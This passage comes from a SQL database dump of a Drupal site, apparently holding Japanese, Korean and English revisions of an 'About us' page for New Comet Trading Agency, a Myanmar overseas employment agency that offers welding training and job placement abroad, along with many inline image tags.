data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 275, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_1.jpg\" data-align=\"center\" data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\" data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 275, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\" data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_1.jpg\" alt=\"\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\" data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\" data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\" data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\" data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\" data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\" data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\" data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\" data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38_1.jpg\" data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\" data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_1.jpg\" data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\"><img data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41_1.jpg\">', '', 'full_html'),
('page', 0, 23, 276, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 276, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_1.jpg\" data-align=\"center\" data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" 